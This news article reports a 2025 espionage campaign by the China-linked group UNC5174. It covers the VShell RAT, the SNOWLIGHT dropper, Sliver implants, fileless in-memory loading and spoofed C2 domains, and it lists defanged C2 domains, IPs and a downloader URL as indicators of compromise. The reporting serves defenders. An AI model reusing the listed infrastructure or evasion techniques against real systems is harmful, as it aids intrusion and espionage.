UNC Returns: China-Linked Threat Group Unleashes Fileless Malware in Sophisticated Espionage Campaign

Listen to this Post

A new cyber threat has emerged on the global stage, as Chinese state-sponsored group UNC5174 returns with a dangerous and stealthy campaign that exemplifies the next evolution in cyber-espionage. Leveraging advanced tools like the open-source remote access trojan VShell and fileless malware techniques, this threat actor has rearmed with a redesigned command-and-control infrastructure that targets sensitive industries around the world.

Discovered in early 2025 by Sysdig’s Threat Research Team, the operation demonstrates a remarkable fusion of stealth, persistence, and technical finesse. This campaign is not just a flash in the pan — it’s a clear signal of the growing sophistication of state-aligned cyber operations, especially those tied to China’s intelligence apparatus.

UNC5174’s 2025 Campaign at a Glance

In this new wave of attacks, UNC5174 shows a clear evolution in both tooling and tactics. Here’s what makes this campaign noteworthy:

  • Introduction of VShell: A powerful new Remote Access Trojan written by a Chinese developer, VShell is being praised in underground circles as a worthy successor to tools like Cobalt Strike.
  • Fileless Malware Delivery: Malware is deployed directly into system memory via the memfd_create syscall, avoiding disk writes and sidestepping most antivirus solutions.
  • Bash-Based Initial Loader: This script not only checks for elevated privileges but ensures persistence via cron jobs and system service tampering.

– Multiple Payloads:

– SNOWLIGHT: Acts as a dropper for VShell.

  • system_worker: A Sliver implant designed for deep system access.
  • dnsloger: Likely a renamed or customized SNOWLIGHT binary for extended functionality.
  • Obfuscation and Masquerading: Tools like Gobfuscate and UPX are used to hide code logic, while fake process names (e.g., kworker/0:2) help mask activity.
  • C2 Infrastructure Innovation: Using domain squatting and spoofing — like gooogleasia[.]com and sex666vr[.]com — UNC5174 builds fake trust while communicating via encrypted channels, WebSockets, and even mTLS.

Detection remains difficult, though tools like Falco are introducing behavioral rules to identify in-memory anomalies.

Targets and Risk Profile

The operation primarily targets:

– Critical Infrastructure

– Technology and Research Organizations

– NGOs across North America, Europe, and Asia-Pacific

These industries are of strategic interest to the Chinese state, aligning with long-term espionage goals.

Key Indicators of Compromise (IoCs)

| Type | Value | Note |

|–||–|

| Domain | vs[.]gooogleasia[.]com | VShell Console C2 |
| Domain | gooogleasia[.]com, sex666vr[.]com | Core C2 Domains |
| IP Address | 34[.]96[.]239[.]183, 8[.]219[.]171[.]47 | C2 Hosting Servers |

| SHA256 | `e6db3de3…` | SNOWLIGHT |

| SHA256 | `8d889441…` | Fileless VShell |

| SHA256 | `21ccb258…` | Sliver Implant |

| URL | http://vs[.]gooogleasia[.]com:8443/?… | VShell Downloader |

What Undercode Say:

UNC5174’s latest operation reflects a strategic convergence of cybercriminal ingenuity and state-level objectives. The use of open-source tooling like VShell isn’t just about saving money — it’s about muddying the waters of attribution. Open tools make it harder for analysts to connect specific malware samples to a particular group or nation-state, especially when the code is widely circulated.

From a tactical perspective, fileless malware is becoming the go-to weapon for persistent threat actors. By operating entirely in memory, the malware sidesteps traditional disk-based detection mechanisms — which are still the primary defense layer for many organizations. This level of evasion, especially when combined with memory-based syscalls like memfd_create, represents the bleeding edge of stealth tactics.

Their command-and-control architecture also deserves scrutiny. Instead of using traditional HTTP/S beacons, UNC5174 leverages WebSockets and encrypted channels (mTLS, WireGuard) — providing low-latency, interactive control over compromised hosts. Add domain spoofing on top, and the group is executing one of the most elusive and scalable C2 strategies we’ve seen in recent months.

The SNOWLIGHT dropper plays a pivotal role in this campaign. It’s a Linux-native implant previously tied to attacks on F5 devices, but it’s evolved. Now, it works seamlessly with VShell to operate without detection, bypassing endpoint monitoring and application controls.

Another layer of complexity lies in their multi-payload strategy. The integration of Sliver — an offensive security framework — shows the group’s intent to embed deeply into systems and maintain control over extended periods. This isn’t smash-and-grab malware; it’s slow, silent, and strategic.

Their choice of victims also highlights long-term goals: tapping into intellectual property, sensitive diplomatic strategies, and infrastructure data — all of which hold immense geopolitical value.

Cloud-based infrastructure hosted in Hong Kong further clouds attribution and complicates take-down efforts, thanks to the scalability and ephemerality of cloud IP ranges.

As for defense, while tools like Falco are catching up with new rules, detection is still reactive. The cybersecurity community must shift toward proactive memory inspection, system call tracing, and behavioral analytics to stay ahead.

This campaign is not just a security incident — it’s a warning shot for what’s coming. UNC5174 and groups like it are mastering the art of digital espionage. And unless defenders rethink their approach, they’re going to stay several steps behind.

Fact Checker Results:

  • UNC5174’s association with China is well-documented by threat intel researchers.
  • VShell and SNOWLIGHT have been independently verified through multiple security firms.
  • Fileless malware deployment via memory-based syscalls is a confirmed trend in current APT campaigns.

References:

Reported By: cyberpress.org
Extra Source Hub:
https://www.discord.com
Wikipedia
Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image